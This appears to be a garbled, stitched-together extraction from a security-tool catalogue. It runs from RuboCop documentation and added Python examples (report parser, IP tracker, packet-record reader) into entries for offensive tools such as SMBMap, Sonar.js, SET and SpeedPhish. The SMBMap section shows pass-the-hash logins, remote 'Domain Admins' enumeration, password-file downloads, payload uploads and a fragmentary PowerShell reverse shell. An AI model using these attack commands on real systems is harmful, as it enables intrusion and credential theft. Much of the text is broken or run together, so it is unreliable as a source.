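SEVERITY_RANK = {"refactor": 0, "convention": 1, "warning": 2, "error": 3, "fatal": 4}

# Constructed sample modelled on the JSON example in the text (not real tool output).
SAMPLE_REPORT = json.dumps({
    "metadata": {"rubocop_version": "0.9.0", "ruby_engine": "ruby",
                 "ruby_version": "2.0.0", "ruby_patchlevel": "195",
                 "ruby_platform": "x86_64-darwin12.3.0"},
    "files": [
        {"path": "lib/foo.rb", "offenses": []},
        {"path": "lib/bar.rb", "offenses": [
            {"severity": "convention", "message": "Line is too long. [81/80]",
             "cop_name": "LineLength", "corrected": True,
             "location": {"line": 546, "column": 80, "length": 4}},
            {"severity": "warning", "message": "Unreachable code detected.",
             "cop_name": "UnreachableCode", "corrected": False,
             "location": {"line": 15, "column": 9, "length": 10}},
        ]},
    ],
    "summary": {"offense_count": 2, "target_file_count": 2, "inspected_file_count": 2},
})


def parse_report(report_json):
    """Flatten the per-file offenses into (path, offense) pairs, validating
    the fields the schema promises so a malformed report fails loudly."""
    data = json.loads(report_json)
    offenses = []
    for entry in data["files"]:
        for off in entry["offenses"]:
            if off["severity"] not in SEVERITY_RANK:
                raise ValueError("unknown severity %r in %s" % (off["severity"], entry["path"]))
            offenses.append((entry["path"], off))
    # Cross-check the summary block against what was actually listed.
    if data["summary"]["offense_count"] != len(offenses):
        raise ValueError("summary offense_count does not match listed offenses")
    return offenses


def offenses_at_or_above(report_json, fail_level="warning", ignore_corrected=True):
    """Return the offenses that should fail the build.

    Offenses already fixed by --auto-correct ("corrected": true) are
    skipped by default, since they are not what the job would ship.
    """
    threshold = SEVERITY_RANK[fail_level]
    return [
        (path, off) for path, off in parse_report(report_json)
        if SEVERITY_RANK[off["severity"]] >= threshold
        and not (ignore_corrected and off.get("corrected", False))
    ]


def count_by_cop(report_json):
    """Per-cop totals, the same view the offense count formatter prints."""
    return Counter(off["cop_name"] for _, off in parse_report(report_json))


def format_emacs_line(path, off):
    """Render an offense in the emacs formatter's path:line:col: S: message shape."""
    loc = off["location"]
    return "%s:%d:%d: %s: %s" % (path, loc["line"], loc["column"],
                                 off["severity"][0].upper(), off["message"])


if __name__ == "__main__":
    failing = offenses_at_or_above(SAMPLE_REPORT, "warning")
    for path, off in failing:
        print(format_emacs_line(path, off))
    print(dict(count_by_cop(SAMPLE_REPORT)))
    raise SystemExit(1 if failing else 0)
```

Run it against a real report with `rubocop --format json --out rubocop.json` and feed the file contents to offenses_at_or_above; the fail_level argument mirrors what --fail-level does inside RuboCop itself.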
(offense count formatter output; per-cop counts lost in extraction)
Documentation
DotPosition
AvoidGlobalVars
EmptyLines
AssignmentInCondition
Blocks
CommentAnnotation
BlockAlignment
IndentationWidth
AvoidPerlBackrefs
ColonMethodCall
--
134 Total
HTML Formatter
Compatibility
RuboCop supports the following Ruby implementations:
MRI 1.9.3
MRI 2.0
MRI 2.1
MRI 2.2
JRuby in 1.9 mode
Rubinius 2.0+
Editor integration
Emacs
Brackets.
TextMate2
Here's one great opportunity to contribute to RuboCop: implement RuboCop integration for your favorite editor.
Guard integration
If you're fond of Guard you might like guard-rubocop . It allows
you to automatically check Ruby code style with RuboCop
when files are modified.
Rake integration
To use RuboCop in your Rakefile add the following:
require 'rubocop/rake_task'
RuboCop::RakeTask.new
# Run RuboCop
rake rubocop
# Auto-correct
rake rubocop:auto_correct
Caching
Large projects containing hundreds or even thousands of files
can take a really long time to inspect, but RuboCop has
functionality to mitigate this problem. There's a caching
mechanism that stores information about offenses found in
inspected files.
Cache Validity
will be done if the cache for the file is still valid, which it is if
there are no changes in:
the contents of the inspected file
RuboCop configuration for the file
the options given to rubocop , with some exceptions that
have no bearing on which offenses are reported
the Ruby version used to invoke rubocop
version of the rubocop program (or to be precise,
anything in the source code of the invoked rubocop
program)
Enabling and Disabling the Cache
Each time a file has changed, its offenses will be stored under
a new key in the cache. This means that the cache will continue
to grow until we do something to stop it. The configuration
parameter AllCops: MaxFilesInCache sets a limit, and when
the number of files in the cache exceeds that limit, the oldest
Extensions
It's possible to extend RuboCop with custom cops and
formatters.
Loading Extensions
Besides the --require command line option you can also
RuboCop::Formatter::BaseFormatter
RuboCop::Cop::Offense
Parser::Source::Range
Download Rubocop
SECURITY CHEATSHEETS - A COLLECTION OF
CHEATSHEETS FOR VARIOUS INFOSEC TOOLS AND
TOPICS
How to Use
CheatSheets:
aircrack-ng
cewl
cidr
cookies
dig
fierce
ftp
http
https-ssl-tls
hydra
john
maltego
markdown
medusa
metasploit
mysql
ncat
nikto
nping
permissions
php
pivoting
ps
python
ruby
shadow
shodan
sqlmap
tcpdump
webservervulns
wireless-encryptions
wireshark
DownloadSecurity CheatSheets
Pivot between multiple data types with Sguil and send pcaps to
Wireshark and NetworkMiner
Easy updates
Data Types
DownloadSecurity Onion
SECURITYSOFTVIEW - DISPLAYS THE ANTIVIRUS /
ANTISPYWARE / FIREWALL REGISTERED WITH THE
SECURITY CENTER OF WINDOWS
/stext
<Filename>
/stab
<Filename>
/scomma
<Filename>
/stabular
<Filename>
/shtml
<Filename>
/sverhtml
<Filename>
/sxml
<Filename>
Download SecuritySoftView
SENTRY - BRUTEFORCE ATTACK BLOCKER (SSH, FTP,
SMTP, AND MORE)
least once. Never again will that forgetful colleague behind the
office NAT router get us locked out of our system. Nor the
admin whose script just failed to login 12 times in 2 seconds.
Sentry includes support for adding IPs to a firewall. Support for
IPFW, PF, ipchains is included. Firewall support is disabled by
default. This is because firewall rules may terminate existing
session(s) to the host (attn IPFW users). Get your IPs
whitelisted (connect 3x or use --whitelist) before enabling the
firewall option.
SIMPLE
Sentry has an extremely simple database for tracking IPs. This
makes it very easy for administrators to view and manipulate
the database using shell commands and scripts. See the
EXAMPLES section.
Sentry is written in perl, which is installed everywhere you find
sshd. It has no dependencies. Installation and deployment is
extremely simple.
FLEXIBLE
Sentry supports blocking connection attempts using
tcpwrappers and several popular firewalls. It is easy to extend
sentry to support additional blocking lists.
Sentry was written to protect the SSH daemon but anticipates
use with other daemons. SMTP support is planned. As this was
written, the primary attack platform in use is bot nets comprised
of exploited PCs on high-speed internet connections. These
bots are used for carrying out SSH attacks as well as spam
delivery. Blocking bots prevents multiple attack vectors.
The programming style of sentry makes it easy to insert code
for additional functionality.
EFFICIENT
The primary goal of Sentry is to minimize the resources an
attacker can steal, while consuming minimal resources itself.
Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter)
expect to run as a daemon, tailing a log file. That requires a
language interpreter to always be running, consuming at least
10MB of RAM. A single hardware node with dozens of virtual
servers will lose hundreds of megs to daemon protection.
Sentry uses resources only when connections are made. The
worst case scenario is the first connection made by an IP,
since it will invoke a perl interpreter. For most connections,
Sentry will append a timestamp to a file, stat for the presence of
another file and exit.
Once an IP is blacklisted for abuse, whether by tcpd or a
firewall, the resources it can consume are practically zero.
Sentry is not particularly efficient for reporting. The "one file per
IP" is superbly minimal for logging and blacklisting, but nearly
any database would perform better for reporting. Expect to wait
a few seconds for sentry --report.
REQUIRED ARGUMENTS
ip
An IPv4 address. The IP should come from a reliable
source that is difficult to spoof. Tcpwrappers is an
excellent source. UDP connections are a poor source as
they are easily spoofed. The log files of TCP daemons can
be good source if they are parsed carefully to avoid log
injection attacks.
ACTIONS
blacklist
deny all future connections
whitelist
whitelist all future connections, remove the IP from the
blacklists, and make it immune to future connection tests.
delist
remove an IP from the white and blacklists. This is useful
for testing that sentry is working as expected.
connect
register a connection by an IP. The connect method will
log the attempt and the time. See CONNECT.
update
Check the most recent version of sentry against the
installed version and update if a newer version is
available.
EXAMPLES
IP REPORT
$ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
9 connections from 24.19.45.95
and it is whitelisted
$ /var/db/sentry/sentry.pl -r
-------- summary --------
1614 unique IPs have connected 76525 times
1044 IPs are blacklisted
18 IPs are whitelisted
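The "one file per IP" model described above, worked through as an added example in Python rather than Sentry's Perl (this is not Sentry's own code). Each IP gets a timestamp file that a connect appends to, a separate file for successful logins, and empty marker files for the blacklist and whitelist, so the report is just a directory walk. The attempt threshold, the marker-file names and the temp directory are this example's assumptions; the "connect 3x" whitelist rule comes from the text. The IP string is parsed strictly before it is used as a file name, which is the practical answer to the log-injection caveat in REQUIRED ARGUMENTS.

```python
"""File-per-IP connection tracker in the style Sentry describes (added example)."""
import ipaddress
import os
import tempfile
import time

BLACKLIST_AFTER = 10   # assumption: attempts before an IP is denied
WHITELIST_AFTER = 3    # text: "connect 3x or use --whitelist"


class IpTracker:
    """One directory; per IP: <ip> (attempt timestamps), <ip>_ok (successful
    logins), and empty marker files <ip>_black / <ip>_white."""

    def __init__(self, dbdir, now=time.time):
        self.dbdir = dbdir
        self.now = now
        os.makedirs(dbdir, exist_ok=True)

    def _path(self, ip, suffix=""):
        # Parse strictly: a string lifted from a log line must never become
        # a path component. Raises ValueError on anything but an IPv4 address.
        return os.path.join(self.dbdir, str(ipaddress.IPv4Address(ip)) + suffix)

    def _has(self, ip, suffix):
        return os.path.exists(self._path(ip, suffix))

    def _append(self, ip, suffix=""):
        with open(self._path(ip, suffix), "a") as fh:
            fh.write("%d\n" % int(self.now()))

    def _count(self, ip, suffix=""):
        try:
            with open(self._path(ip, suffix)) as fh:
                return sum(1 for line in fh if line.strip())
        except FileNotFoundError:
            return 0

    def connect(self, ip):
        """Register a connection attempt and return the resulting status."""
        if self._has(ip, "_white"):
            return "whitelisted"
        if self._has(ip, "_black"):
            return "blacklisted"
        self._append(ip)
        if self._count(ip) >= BLACKLIST_AFTER:
            self.blacklist(ip)
            return "blacklisted"
        return "allowed"

    def login_ok(self, ip):
        """A successful login; after WHITELIST_AFTER of them the IP is immune."""
        self._append(ip, "_ok")
        if self._count(ip, "_ok") >= WHITELIST_AFTER:
            self.whitelist(ip)

    def blacklist(self, ip):
        open(self._path(ip, "_black"), "a").close()

    def whitelist(self, ip):
        self.delist(ip)                      # drop any blacklist entry first
        open(self._path(ip, "_white"), "a").close()

    def delist(self, ip):
        for suffix in ("_white", "_black"):
            try:
                os.remove(self._path(ip, suffix))
            except FileNotFoundError:
                pass

    def report(self):
        """Totals in the shape of the summary report shown above."""
        totals = {"unique_ips": 0, "connections": 0, "blacklisted": 0, "whitelisted": 0}
        for name in os.listdir(self.dbdir):
            if name.endswith("_black"):
                totals["blacklisted"] += 1
            elif name.endswith("_white"):
                totals["whitelisted"] += 1
            elif "_" not in name:            # the attempt log itself
                totals["unique_ips"] += 1
                totals["connections"] += self._count(name)
        return totals


def make_tracker(dbdir=None):
    """Fresh temp directory unless one is given, so the example runs offline."""
    return IpTracker(dbdir or tempfile.mkdtemp(prefix="sentry-demo-"))


if __name__ == "__main__":
    t = make_tracker()
    for _ in range(BLACKLIST_AFTER):
        t.connect("203.0.113.7")             # constructed: a brute-forcing host
    for _ in range(WHITELIST_AFTER):
        t.login_ok("198.51.100.4")           # constructed: the forgetful colleague
    print(t.connect("203.0.113.7"), t.connect("198.51.100.4"), t.report())
```

As in Sentry, the expensive path is only the first contact: after an IP is marked, connect does one stat and returns, and whatever wraps the tracker (tcpwrappers or a firewall rule) does the actual blocking.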
DownloadSentry
SET V6.5 - THE SOCIAL-ENGINEER TOOLKIT MR ROBOT
Supported platforms
Linux
Windows (experimental)
DownloadSET v6.5
SHELLCHECK - AUTOMATICALLY DETECTS PROBLEMS
WITH SH/BASH SCRIPTS AND COMMANDS
Build Materials
simp-core
simp-doc
simp-rsync
Puppet Modules
pupmod-simp-acpid
pupmod-simp-activemq
pupmod-simp-aide
pupmod-simp-apache
pupmod-simp-auditd
pupmod-simp-autofs
pupmod-simp-backuppc
pupmod-simp-cgroups
pupmod-simp-clamav
pupmod-simp-common
pupmod-simp-concat
pupmod-simp-dhcp
pupmod-simp-elasticsearch
pupmod-simp-freeradius
pupmod-simp-functions
pupmod-simp-ganglia
pupmod-simp-gfs2
pupmod-simp-iptables
pupmod-simp-jenkins
pupmod-simp-kibana
pupmod-simp-krb5
pupmod-simp-libvirt
pupmod-simp-logrotate
pupmod-simp-logstash
pupmod-simp-mcafee
pupmod-simp-mcollective
pupmod-simp-mozilla
pupmod-simp-multipathd
pupmod-simp-named
pupmod-simp-network
pupmod-simp-nfs
pupmod-simp-nscd
pupmod-simp-ntpd
pupmod-simp-oddjob
pupmod-simp-openldap
pupmod-simp-openscap
pupmod-simp-pam
pupmod-simp-pki
pupmod-simp-polkit
pupmod-simp-postfix
pupmod-simp-pupmod
pupmod-simp-rsync
pupmod-simp-rsyslog
pupmod-simp-site
pupmod-simp-selinux
pupmod-simp-shinken
pupmod-simp-simp
pupmod-simp-snmpd
pupmod-simp-ssh
pupmod-simp-sssd
pupmod-simp-stunnel
pupmod-simp-sudo
pupmod-simp-sudosh
pupmod-simp-svckill
pupmod-simp-sysctl
pupmod-simp-tcpwrappers
pupmod-simp-tftpboot
pupmod-simp-tpm
pupmod-simp-upstart
pupmod-simp-vnc
pupmod-simp-vsftpd
pupmod-simp-windowmanager
pupmod-simp-xinetd
pupmod-simp-xwindows
rubygem-simp-rake-helpers
rubygem-simp-cli
augeasproviders_apache
augeasproviders_base
augeasproviders_core
augeasproviders_grub
augeasproviders_mounttab
augeasproviders_nagios
augeasproviders_pam
augeasproviders_postgresql
augeasproviders_puppet
augeasproviders_shellvar
augeasproviders_ssh
puppet-elasticsearch
puppetlabs-apache
puppetlabs-postgresql
puppetlabs-stdlib
puppetlabs-inifile
puppetlabs-puppetdb
puppetlabs-mysql
puppetlabs-java
puppet-gpasswd
augeasproviders_sysctl
puppet-datacat
puppetlabs-java_ks
puppet-memcached
Download SIMP
SMARTSNIFF V2.16 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
SYSTEM REQUIREMENTS
DownloadSmartSniff v2.16
SMARTSNIFF V2.17 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
Using SmartSniff
Display only TCP and UDP packets that use the following
port range: 53 - 139:
include:both:tcpudp:53-139
0A - (4 bytes) IP Address
Header of each packet:
00 (2 Bytes) packet header size (currently 0x18 bytes)
02 (4 Bytes) number of received bytes in packet.
06 (8 Bytes) Packet time in Windows FILETIME format.
0E (6 Bytes) Source Mac Address.
14 (6 Bytes) Dest. Mac Address.
1A The remaining bytes are the TCP/IP packet itself.
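A reader of the packet record layout above, written as an added example (not NirSoft's code). It walks a buffer of records using the size field stored in each header rather than a constant, decodes the FILETIME and both MAC addresses, and then applies the same port-range test as the include:both:tcpudp:53-139 display filter quoted earlier by decoding just enough of the IPv4 header. The offsets listed put the first packet byte at 0x1A, so the constructed sample records use that header size; little-endian field order and the sample packets themselves are this example's assumptions, not something the text states.

```python
"""Walk SmartSniff-style packet records and filter by port range (added example)."""
import struct
from datetime import datetime, timedelta, timezone

HEADER_FMT = "<HIQ6s6s"                    # hdr size, bytes received, FILETIME, src MAC, dst MAC
HEADER_MIN = struct.calcsize(HEADER_FMT)   # 0x1A: where the offsets above put the packet
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    td = dt - FILETIME_EPOCH
    return ((td.days * 86400 + td.seconds) * 10**6 + td.microseconds) * 10


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def parse_records(buf):
    """Return one dict per record. The header size in each record is trusted
    instead of a constant; truncated or nonsensical input raises ValueError."""
    records, off = [], 0
    while off < len(buf):
        if off + HEADER_MIN > len(buf):
            raise ValueError("truncated header at offset %d" % off)
        hdr_size, nbytes, ft, src, dst = struct.unpack_from(HEADER_FMT, buf, off)
        if hdr_size < HEADER_MIN:
            raise ValueError("header size %#x shorter than its fields at %d" % (hdr_size, off))
        start, end = off + hdr_size, off + hdr_size + nbytes
        if end > len(buf):
            raise ValueError("truncated packet at offset %d" % off)
        records.append({"time": filetime_to_datetime(ft), "src_mac": mac_str(src),
                        "dst_mac": mac_str(dst), "packet": buf[start:end]})
        off = end
    return records


def ipv4_summary(packet):
    """Decode just enough of an IPv4 packet (no Ethernet header: the MACs live
    in the record header) to filter on protocol and ports."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    proto = packet[9]
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    ports = None
    if proto in (6, 17) and len(packet) >= ihl + 4:   # TCP or UDP
        ports = struct.unpack_from("!HH", packet, ihl)
    return {"proto": proto, "src": src, "dst": dst, "ports": ports}


def matches_port_range(packet, lo, hi):
    """Equivalent of the include:both:tcpudp:lo-hi display filter quoted above."""
    s = ipv4_summary(packet)
    return bool(s and s["ports"] and any(lo <= p <= hi for p in s["ports"]))


# ---- constructed sample capture (test data, not a real SmartSniff file) ----
def build_record(ft, src_mac, dst_mac, packet):
    return struct.pack(HEADER_FMT, HEADER_MIN, len(packet), ft, src_mac, dst_mac) + packet


def _ipv4(proto, src_ip, dst_ip, payload):
    def ip(s):
        return bytes(int(x) for x in s.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0x4000,
                       64, proto, 0, ip(src_ip), ip(dst_ip)) + payload


SAMPLE_TIME = datetime(2016, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
SRC_MAC, DST_MAC = b"\x00\x11\x22\x33\x44\x55", b"\xaa\xbb\xcc\xdd\xee\xff"
SAMPLE = (
    build_record(datetime_to_filetime(SAMPLE_TIME), SRC_MAC, DST_MAC,
                 _ipv4(17, "192.168.1.10", "192.168.1.1",
                       struct.pack("!HHHH", 51000, 53, 8, 0)))          # UDP to port 53
    + build_record(datetime_to_filetime(SAMPLE_TIME) + 10_000_000, SRC_MAC, DST_MAC,
                   _ipv4(6, "192.168.1.10", "192.0.2.1",
                         struct.pack("!HHIIBBHHH", 51001, 443, 1, 0, 0x50, 0x02, 8192, 0, 0)))
)

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        shown = matches_port_range(rec["packet"], 53, 139)
        print(rec["time"].isoformat(), rec["src_mac"], "->", rec["dst_mac"],
              ipv4_summary(rec["packet"]), "shown" if shown else "hidden")
```

Trusting the size field rather than hard-coding 0x1A is what keeps record boundaries correct if the header layout grows in a later version; the length checks before each slice are what stop a corrupt or truncated capture from turning into an exception deep inside the decoder.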
DownloadSmartSniff v2.17
SMARTTY - MULTI-TABBED SSH CLIENT WITH SCP
SUPPORT
DownloadSmarTTY
Pass-the-Hash Support
File upload/download/delete
Permission enumeration (writable share, meet Metasploit)
Remote Command Execution
Help
SMBMap - Samba Share Enumerator | Shawn Evans ShawnDEvans@gmail.com
optional arguments:
-h, --Help
Main arguments:
-H HOST
IP of host
--host-file FILE
-u USERNAME
assumed
-p PASSWORD
-s SHARE
'C$'
-d DOMAIN
-P PORT
Command Execution:
Options for executing commands on the specified host
-x COMMAND
r'
Filesystem Search:
Options for searching/enumerating the filesystem of the
specified host
-L
host
-R [PATH]
C:\Users), ex 'D:\HR\'
Filesystem interaction:
Options for interacting with the specified host's
filesystem
--download PATH
system,
ex.'C$\temp\passwords.txt'
--upload SRC DST
system ex.
'/tmp/payload.exe C$\temp
\payload.exe'
--delete PATH TO FILE
Delete a remote file, ex. 'C$
\temp\msf.exe'
--skip
prompt
Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'
Default Output:
$
p 'R33nisP!nckl3' -d ABC
Name: unkown
ADMIN$
READ, WRITE
C$
READ, WRITE
Command execution:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445
Name: unkown
Group name
Domain Admins
Comment
Members
-----------------------------------------------------------------------------abcadmin
The command completed successfully.
.Users
dw--w--w-2015
.
dw--w--w--
2015
..
dr--r--r--
Administrator
dr--r--r--
0 Thu Apr
9 14:46:57 2015
0 Thu Apr
9 14:46:49 2015
0 Thu Apr
9 14:46:57 2015
9 14:44:01 2015
0 Thu Apr
9 14:46:49 2015
All Users
dw--w--w-Default
dr--r--r-Default User
fr--r--r-desktop.ini
dw--w--w-Public
dr--r--r--
wingus
\861d4cd845124cad95d42175.txt
[+] Grabbing search results, be patient, share drives
tend to be big...
[+] Job 1 of 1 completed
[+] All jobs complete
Host: 192.168.1.203
Pattern: password
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\logins.json
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\prefs.js
Drive Listing:
\\vboxsrv\Public
VirtualBox Shared
Folders
Nifty Shell:
$c=New-Object system.net.sockets.tcpclient;$c.connect($a,
$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[]
$c.ReceiveBufferSize
;$p=New-Object
System.Diagnostics.Process
$p.StartInfo.FileName=""""cmd.exe""""
$p.StartInfo.RedirectStandardInput=1
;
;
$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShe
llExecute=0
;$p.Start()
$p.StandardOutput
;$is=$p.StandardInput
;Start-Sleep 1
System.Text.AsciiEncoding
;$os=
;$e=new-object
+= $e.GetString($os.Read())} $s.Write($e.GetBytes($out),
0,$out.Length)
;$out=$null;$done=$false;while (-not
$out=
$s.Write($e.GetBytes($out),
Name: unkown
All rights
reserved.
C:\Windows\system32>whoami
nt authority\system
Download SMBMap
SN1PER - AUTOMATED PENTEST RECON SCANNER
Sn1per is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities.
Features
Install
chmod +x install.sh
./install.sh
./sn1per
SAMPLE REPORT:
https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per%2520Sample%2520Report
Download Sn1per
SNIFFLY - SNIFFING BROWSER HISTORY USING HSTS +
CSP.
How it works
where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full
Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones
with max-age less than 1 day and ones that are preloaded:
$ cd util
Once that's done, you can copy the hosts from processed.log
into src/index.js .
Running sploitz
Visiting file:///path/to/sniffly/src/index.html in
Chrome should just work. In Firefox, CSP headers set via the
<meta> tag are apparently not supported yet, so you need to set up a
local webserver to serve the CSP HTTP response header. My
Nginx server block looks something like this:
server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http:";
        index index.html;
    }
}
Or in .htaccess :
<IfModule mod_headers.c>
Header set Content-Security-Policy "img-src http:"
</IfModule>
header('Content-Security-Policy: '.$csp_rules);
?>
Caveats
Acknowledgements
Download Sniffly
SNIFFPASS - PASSWORD MONITORING/SNIFFING
SOFTWARE (WEB/FTP/EMAIL)
Description
/NoCapDriver
/NoReg
DownloadSniffPass
SNITCH - INFORMATION GATHERING VIA DORKS
-U [url], --url=[url]                domain(s) or domain extension(s) separated by comma *
-D [type], --dork=[type]             dork type(s) separated by comma *
-O [file], --output=[file]           output file
-S [ip:port], --socks=[ip:port]      socks5 proxy
-I [seconds], --interval=[seconds]   interval between requests, 2s by default
-P [pages], --pages=[pages]          pages to retrieve, 10 by default
-v                                   turn on verbosity
Dork types:
info
ext
| Sensitive extensions
docs
| Web software
all
| All
Examples:
snitch.py -I5 -P3 --dork=ext,info -U gov -S 127.0.0.1:9050
snitch.py --url=site.com -D all -O /tmp/dorks
DownloadSnitch
SNMP BRUTE - FAST SNMP BRUTE FORCE,
ENUMERATION, CISCO CONFIG DOWNLOADER AND
PASSWORD CRACKING SCRIPT
SNMP brute force, enumeration, CISCO config downloader and
password cracking script. Listens for any responses to the
brute force community strings, effectively minimising wait time.
Requirements
metasploit
snmpwalk
snmpstat
john the ripper
Usage
Options
--target=IP, -t IP Host IP
--port=PORT, -p PORT SNMP port
Advanced
Automation
Operating Systems
Alternative Options
Features
DownloadSNMP Brute
SOCAT - MULTIPURPOSE RELAY (SOCKET CAT)
Socat is a utility similar to the venerable Netcat that works over
a number of protocols and through files, pipes, devices
(terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP,
TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It
provides forking, logging, and dumping, different modes for
interprocess communication, and many more options. It can be
used, for example, as a TCP relay (one-shot or daemon), as a
daemon-based socksifier, as a shell interface to Unix sockets,
as an IP6 relay, for redirecting TCP-oriented programs to a
serial line, or to establish a relatively secure environment (su
and chroot) for running client or server shell scripts with
network connections.
Socat is a command line based utility that establishes two
bidirectional byte streams and transfers data between them.
Because the streams can be constructed from a large set of
different types of data sinks and sources (see address types),
and because lots of address options may be applied to the
streams, socat can be used for many different purposes.
Filan is a utility that prints information about its active file
descriptors to stdout. It was written for debugging socat,
but might be useful for other purposes too. Use the -h option
for more information.
specifications.
-V
-hh
Like -h, plus a list of the short names of all available address
options. Some options are platform dependent, so this output
is helpful for checking the particular implementation.
-hhh | -???
-v
Writes the transferred data not only to their target streams, but
also to stderr. The output format is text with some conversions
for readability, and prefixed with "> " or "< " indicating flow
directions.
-x
Writes the transferred data not only to their target streams, but
also to stderr. The output format is hexadecimal, prefixed with
"> " or "< " indicating flow directions. Can be combined with -v .
-b<size>
-T<timeout>
When one channel has reached EOF, the write part of the other
channel is shut down. Then, socat waits <timeout> [timeval]
seconds before terminating. Default is 0.5 seconds. This
timeout only applies to addresses where write and read part
can be closed independently. When during the timeout interval
the read part gives EOF, socat terminates without awaiting the
timeout.
Download Socat
SOFTAVIR - ANTIVIRUS FOR WINDOWS BASED ON
WHITELISTS
DownloadSoftavir
SONAR.JS - FRAMEWORK FOR IDENTIFYING AND
LAUNCHING EXPLOITS AGAINST INTERNAL NETWORK
HOSTS
A framework for identifying and launching exploits against
internal network hosts. Works via WebRTC IP enumeration,
WebSocket host scanning, and external resource fingerprinting.
Fingerprints
        'fingerprints': ["/images/New_ui/asustitle.png", "/images/loading.gif",
                         "/images/alertImg.png", "/images/New_ui/networkmap/line_one.png",
                         "/images/New_ui/networkmap/lock.png",
                         "/images/New_ui/networkmap/line_two.png", "/index_style.css",
                         "/form_style.css", "/NM_style.css", "/other.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
    {
        'name': "Linksys WRT54G",
        'fingerprints': ["/UILinksys.gif", "/UI_10.gif", "/UI_07.gif", "/UI_06.gif",
                         "/UI_03.gif", "/UI_02.gif", "/UI_Cisco.gif", "/style.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
]
DownloadSonar.js
SPARKYLINUX - LIGHTWEIGHT & FAST DEBIAN-BASED
LINUX DISTRIBUTION
Why Sparky?
Download SparkyLinux
SPARTA - NETWORK INFRASTRUCTURE PENETRATION
TESTING TOOL
Download SPARTA
SPEEDTEST - COMMAND LINE INTERFACE FOR TESTING
INTERNET BANDWIDTH
pip / easy_install
or
easy_install speedtest-cli
Github
pip install git+https://github.com/sivel/speedtest-cli.git
or
git clone https://github.com/sivel/speedtest-cli.git
python speedtest-cli/setup.py install
or
curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
Usage
$ speedtest-cli -h
usage: speedtest-cli [-h] [--bytes] [--share] [--simple] [--list]
                     [--server SERVER] [--mini MINI] [--source SOURCE]
                     [--timeout TIMEOUT] [--version]
Command line interface for testing internet bandwidth using speedtest.net.
--------------------------------------------------------------------------
https://github.com/sivel/speedtest-cli
optional arguments:
  -h, --help
  --bytes
  --share            speedtest.net share results image
  --simple           basic information
  --list             servers sorted by distance
  --server SERVER
  --mini MINI
  --source SOURCE
  --timeout TIMEOUT
  --version
Download Speedtest
SPF - SPEEDPHISH FRAMEWORK
Requirements:
dnspython
twisted
PhantomJS
Usage:
usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [-all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>]
              [-v] [-y]
optional arguments:
  -h, --help
  -d <domain>
  -c <company's name>
  --ip <IP address>      IP of webserver defaults to [192.168.1.124]
  -v, --verbosity
input files:
  -f <list.txt>          addresses
  -C <config.txt>        config file
enable flags:
  --all                  -s -w)
  --test                 emails... same as
  -g                     email targets
  -s                     emails to targets
  -w                     sites
  -W                     termination of spf.py
misc:
  -y                     questions
Execution:
cd spf
python spf.py --test -d example.com
Misc
Data Sources | Location | Notes
abuse.ch | http://www.abuse.ch | Various malware trackers.
AdBlock | https://easylistdownloads.adblockplus.org/easylist.txt | AdBlock pattern matches
AlienVault | https://reputation.alienvault.com | AlienVault's IP reputation database.
Autoshun.org | http://www.autoshun.org | Blacklists.
AVG Site Safety Report | http://www.avgthreatlabas.com | Site safety checker.
Bing | http://www.bing.com | Scraping but future version to also use API.
Blocklist.de | http://lists.blocklist.de | Blacklists.
Checkusernames.com | http://www.checkusernames.com | Look up username availability on popular sites.
DNS | | Defaults to your local DNS but can be configured to whatever IP address you supply SpiderFoot.
Domain Tools | http://www.domaintools.com |
DroneBL | http://www.dronebl.org |
DuckDuckGo | http://www.duckduckgo.com |
Facebook | http://www.facebook.com | Scraping but future version to also use API.
FreeGeoIP | http://freegeoip.net |
Github | http://www.github.com |
Google | http://www.google.com | Scraping but future version to also use API.
Google+ | http://plus.google.com | Scraping but future version to also use API.
Google Safe Browsing | http://www.google.com/safebrowsing | Site safety checker.
